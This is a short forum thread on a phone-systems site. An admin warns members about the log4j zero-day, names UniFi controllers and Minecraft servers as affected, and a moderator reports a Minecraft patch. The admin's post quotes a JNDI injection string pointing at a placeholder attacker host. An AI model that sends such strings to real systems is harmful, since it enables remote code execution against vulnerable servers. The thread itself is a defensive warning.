Phone Systems

Sponsored by Atcom
Get a free phone!
Previous Thread
Next Thread
Print Thread
Rate Thread
Joined: Aug 2004
Posts: 1,379
Likes: 9
Toner Offline OP
Admin
*****
OP Offline
Admin
*****
Joined: Aug 2004
Posts: 1,379
Likes: 9
There is a nasty zero day exploit that was just made public around a certain Java logging application called "log4j" - see some details here: https://sysdig.com/blog/cve-critical-vulnerability-log4j/

One thing I know for sure that's affected is the Unifi controller software (there is a patch available). Apparently it really sucks for Minecraft servers too.

A bad actor can supposedly run any code they want simply by sending ${jndi:ldap://BADHOST.COM:PORT/RemoteCommand}

Ug. bash

Atcom VoIP Demo
Get a VoIP Demo Today
Joined: Jun 2006
Posts: 2,921
Moderator-Samsung
*****
Offline
Moderator-Samsung
*****
Joined: Jun 2006
Posts: 2,921
Microsoft has released a patch for Minecraft servers (1.18.1)

I expect there'll be a patch soon for unifi as well.


Moderated by  MooreTel 

Link Copied to Clipboard
Forum Statistics
Forums84
Topics93,521
Posts635,349
Members49,569
Most Online5,661
May 23rd, 2018
Popular Topics (Views)
Today's Birthdays
Bob Lafleur, Chez, Jodi Wurts, Miltonar
Newest Members
Implementing1A2, DLP, jaywin, dust0vich, Edward Clark
49,569 Registered Users
Top Posters (30 Days)
Toner 14
dexman 7
Who's Online Now
0 members (), 6 guests, and 14 robots.
Key: Admin, Global Mod, Mod
Contact Us | Sponsored by Atcom: VoIP Phones | Terms of Service

Sundance Communications is not affiliated with any of the above manufacturers.
©Copyright Sundance Communications 1998-2022
Powered by UBB.threads™ PHP Forum Software 7.7.5